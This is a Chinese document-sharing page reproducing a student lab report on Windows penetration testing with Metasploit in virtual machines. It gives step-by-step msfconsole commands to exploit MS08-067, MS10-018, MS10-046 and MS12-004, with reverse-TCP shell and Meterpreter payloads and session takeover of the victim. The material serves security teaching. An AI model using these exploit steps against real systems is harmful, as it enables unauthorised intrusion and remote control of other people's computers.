ImageVerifierCode 换一换
格式:DOCX , 页数:21 ,大小:8.01MB ,
资源ID:10110957      下载积分:12 金币
快捷下载
登录下载
邮箱/手机:
温馨提示:
快捷下载时,用户名和密码都是您填写的邮箱或者手机号,方便查询和重复下载(系统自动生成)。 如填写123,账号就是123,密码也是123。
特别说明:
请自助下载,系统不会自动发送文件的哦; 如果您已付费,想二次下载,请登录后访问:我的下载记录
支付方式: 支付宝    微信支付   
验证码:   换一换

加入VIP,免费下载
 

温馨提示:由于个人手机设置不同,如果发现不能下载,请复制以下地址【https://www.bdocx.com/down/10110957.html】到电脑端继续下载(重复下载不扣费)。

已注册用户请登录:
账号:
密码:
验证码:   换一换
  忘记密码?
三方登录: 微信登录   QQ登录  

下载须知

1: 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。
2: 试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓。
3: 文件的所有权益归上传用户所有。
4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
5. 本站仅提供交流平台,并不能对任何下载内容负责。
6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

版权提示 | 免责声明

本文(计算机系统安全 实验二metasploit.docx)为本站会员(b****8)主动上传,冰豆网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知冰豆网(发送邮件至service@bdocx.com或直接QQ联系客服),我们立即给予删除!

计算机系统安全 实验二metasploit.docx

1、计算机系统安全 实验二metasploit计算机系统安全 实验二:操作系统安全与metasploit渗透测试实验目的: 学习计算机操作系统安全相关内容。 学习操作系统渗透相关内容 学习metasploit渗透工具使用。实验原理:Windows 操作系统安全结构网络渗透原理实验环境:软件: vmware 环境下, 虚拟机, vm-WinXP镜像 虚拟机,backtrack 4及backtrack 5 虚拟机镜像 等。实验拓扑:被渗透机: 使用虚拟机XP,建议使用未安装更新的英文XP操作系统, 设置其IP地址为,自动获得,虚拟机网络连接方式 NAT方式。实验室计算机network系统下中netwo

2、rk_vm 目录中有metasploitable_XP,可使用之。渗透测试机: 使用Bt4或5作为操作系统,准备工作: 启动两台虚拟机,按上图方式设置,请先记录下两台虚拟机的IP: 被渗透机: 操作系统:_windows xp with sp1_ IP地址: 渗透测试机: 操作系统:_bt5_ IP地址:注意,若网络连接未启用,请先启用之,linux 下可使用ifup eth0)实验内容:第一部分:针对操作系统内部服务端口进行渗透了解ms08-067漏洞详情:(请课后上网查询相关内容)漏洞描述:曾经的冲击波、震荡波等大规模攻击都是由于Windows的RPC服务漏洞造成的,MS08-067远程溢

3、出漏洞也不例外。MS08-067远程溢出漏洞的原因是由于Windows系统中RPC存在缺陷造成的,Windows系统的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送恶意的RPC请求触发这个溢出,如果受影响的系统收到了特制伪造的RPC请求,可能允许远程执行代码,导致完全入侵用户系统,以SYSTEM权限执行任意指令并获取数据,并获取对该系统的控制权,造成系统失窃及系统崩溃等严重问题。漏洞对象:受MS08-067远程溢出漏洞影响的系统非常多,受影响的操作系统有Windows XP /2000/Vista/2003等。除Windows Server 2008 Core

4、外,基本上所有的Windows系统都会遭受此漏洞的攻击,特别是在Windows 2000、Windows XP和Windows Server 2003系统,攻击者可以利用此漏洞无需通过认证运行任意代码。这个漏洞还可能被蠕虫利用,此安全漏洞可以通过恶意构造的网络包直接发起攻击,并且攻击者可以获取完整权限,因此该漏洞很可能会被用于制作蠕虫以进行大规模的攻击。漏洞端口:_445_步骤一:启动metasploit 控制台msfconsole记录其步骤二:搜索模块 ms08-067号模块search ms08-067找到模块,记录其名称,级别,描述步骤三:使用这个模块use windows/smb/ms

5、08_067_netapi步骤四:查找有用的payloadsshow payloads步骤五:使用其中最常用的一个payloadset payload windows/shell/reverse_tcp步骤六:查看当前的这个payload 以及攻击所需要的参数选项show options发现模块所需要选项,有些有默认参数: RPORT ,SMBPIPE 有些没有 RHOST 发现payload所需要参数,有些有默认参数: EXITFUNC ,LPORT 有些没有 : LHOST 渗透的目标设置值 : 0 步骤七:设置参数set RHOST 被渗透主机的IP地址set LHOST 渗透测试主机的

6、IP地址。步骤八:show options 查看当前参数设置是否齐全。步骤九:show targets 查看当前攻击的目标。0 若有,则表示可进行自动选择攻击。其他,则为特定选择特定系统。步骤十:参数齐全,目标选定,渗透载荷准备就绪,然后实施。exploit渗透开始。自动创建一shell (命令提示符)使用ipconfig 及dir等命令确定当前控制的计算机是哪台。 打开放大镜:步骤十一:Exit 然后再exit退出。第二部分:针对操作系统下的浏览器进行渗透 步骤一:浏览器漏洞MS10-018了解ms10-018漏洞详情:(请课后上网查询相关内容)漏洞描述: 在提交数据时Internet Ex

7、plorer处理使用特制编码字符串的内容的方式存在信息泄露漏洞。攻击者可以通过创建特制的网页来利用这个漏洞,如果用户查看了该网页就会导致信息泄露。成功利用这个漏洞的攻击者可以查看本地计算机或其他域或Internet Explorer区中的其他浏览器窗口的内容。漏洞对象: Microsoft _Internet _Explorer SP4漏洞端口: 8080 步骤一:启动metasploit 控制台msfconsole步骤二:搜索模块 ms10-018号模块search ms10-018找到模块,记录其名称,级别,描述步骤三:使用这个模块use windows/browser/ms10_018_

8、ie_behaviors步骤四:查找有用的payloadsshow payloads步骤五:使用其中最常用的一个payloadset payload windows/shell/reverse_tcp步骤六:查看当前的这个payload 以及攻击所需要的参数选项show options发现模块所需要选项,有些有默认参数: SRVHOST,SRVPORT,SSL,SSLVersion 有些没有 : URIPATH 发现payload所需要参数,有些有默认参数: EXITFUNC,LPORT 有些没有 : LHOST 步骤七:设置SRVHOST 和LHOST 都设置为渗透测试机 IPset SRV

9、HOST LHOST 可设置为 0渗透准备exploit 则列出一URL如:using url : 暂时渗透到此(注意其中的qte30235fs为自动产生)在当对方机器 使用时,sessions产生使用sessions 来获知sessionsessions -i 1直接将session 转到shell中创建一shell (命令提示符)使用ipconfig 及dir等命令确定当前控制的计算机是哪台打开写字板:第三部分:针对操作系统下类似快捷方式使用进行渗透步骤一:浏览器漏洞MS10-046了解ms10-046漏洞详情:(请课后上网查询相关内容)漏洞描述:Windows支持使用快捷方式或LNK文件

10、。LNK文件是指向本地文件的引用,点击LNK文件与点击快捷方式所指定的目标具有相同的效果。Windows没有正确地处理LNK文件,特制的LNK文件可能导致Windows自动执行快捷方式文件所指定的代码。这些代码可能位于USB驱动、本地 或远程文件系统、光驱或其他位置,使用资源管理器查看了LNK文件所在位置就足以触发这个漏洞。默认下Windows启动了自动加载和自动播放功能,因此 在连接可移动设备(如USB闪存)后Windows会自动打开资源管理器。其他显示文件图标的应用也可用作这个漏洞的攻击载体。 漏洞对象:Microsoft Windows XP SP3Microsoft Windows X

11、P SP2Microsoft WindowsVistaSP2Microsoft WindowsVistaSP1Microsoft Windows Server 2008Microsoft Windows Server 2008 SP2Microsoft Windows Server 2008 R2Microsoft Windows Server 2003 SP2Microsoft Windows 7 漏洞端口:_80_步骤一:启动metasploit 控制台msfconsole步骤二:搜索模块 ms10-046号模块search ms10-046找到模块,记录其名称,级别,描述步骤三:使用这个

12、模块use windows/browser/ms10_046_shortcut_icon_dllloader步骤四:查找有用的payloadsshow payloads步骤五:使用其中最常用的一个payloadset payload windows/shell/reverse_tcp步骤六:查看当前的这个payload 以及攻击所需要的参数选项show options发现模块所需要选项,有些有默认参数: SRVPORT ,SRVHOST ,URIPATH 有些没有 UNCHOST 发现payload所需要参数,有些有默认参数: EXITFUNC ,LPORT 有些没有 : LHOST 步骤七:

13、设置SRVHOST 和LHOST 都设置为渗透测试机 IPset SRVHOST LHOST 设置浏览的URLset URIPATH (其中hzs 为你的姓名的首字母)target 可设置为 0渗透准备exploit 报错,说明URIPATH不能改动,需要改回默认值重新exploit则列出一URL如:using url : 暂时渗透到此在当对方机器 使用如:using url : 时,sessions产生使用sessions 来获知sessionsessions -i 1直接将session 转到shell中创建一shell (命令提示符)使用ipconfig 及dir等命令确定当前控制的计算

14、机是哪台打开任务管理器:使用taskmgr命令*第四部分:渗透时使用meterpreter工具。浏览器漏洞MS12-004Windows Media Player是系统的多媒体播放组件。WMP在处理畸形结构的MIDI数据时存在内存破坏漏洞,远程攻击者可能利用此漏洞通过诱使用户访问恶意网页控制用户系统。受影响系统:Microsoft Windows XP ProfessionalMicrosoft Windows XP Home EditionMicrosoft Windows VistaMicrosoft Windows Storage Server 2003Microsoft Windows

15、 Server 2008Microsoft Windows Server 2003 Web EditionMicrosoft Windows Server 2003 Standard EditionMicrosoft Windows Server 2003 Enterprise EditionMicrosoft Windows Server 2003 Datacenter EditionMicrosoft Windows 7启动msfconsolesearch ms12_004搜索不到该模块得到相关结果为windows/browser/ms12_004_midi使用它use windows/b

16、rowser/ms12_004_midi查看 payloadsshow payloadsset payload windows/meterpreter/reverse_tcp查看相关的选项optionsshow options有SRVHOST SRVPORT SSL及SSL version为模块的参数有EXITFUNC和LHOST 及LPORT作为payload的参数。还有target 设置设置SRVHOST 和LHOST 都设置为本地IPset SRVHOST LHOST 可设置为 0set URLPATH 渗透准备exploit 则列出一URL如:using 暂时渗透到此在当对方机器 使用时,sessions产生使用sessions 来获知sessionsessions -i 1直接将session 转到shell中创建至meterpreter 使用命令查看当前的meterpreter 可操作的内容。试使用相关的进程管理工具对被渗透计算机上的进行管理!实验心得:通过实验学习到了如何利用metasploit入侵其他电脑,可以在知道对方ip地址的情况下主动渗透,也可以诱使用户访问恶意网页控制用户系统,由此可见漏洞被不法之徒利用之后会对用户造成巨大的损失,让我意识到学好计算机系统安全这门课的重要性。

copyright@ 2008-2022 冰豆网网站版权所有

经营许可证编号:鄂ICP备2022015515号-1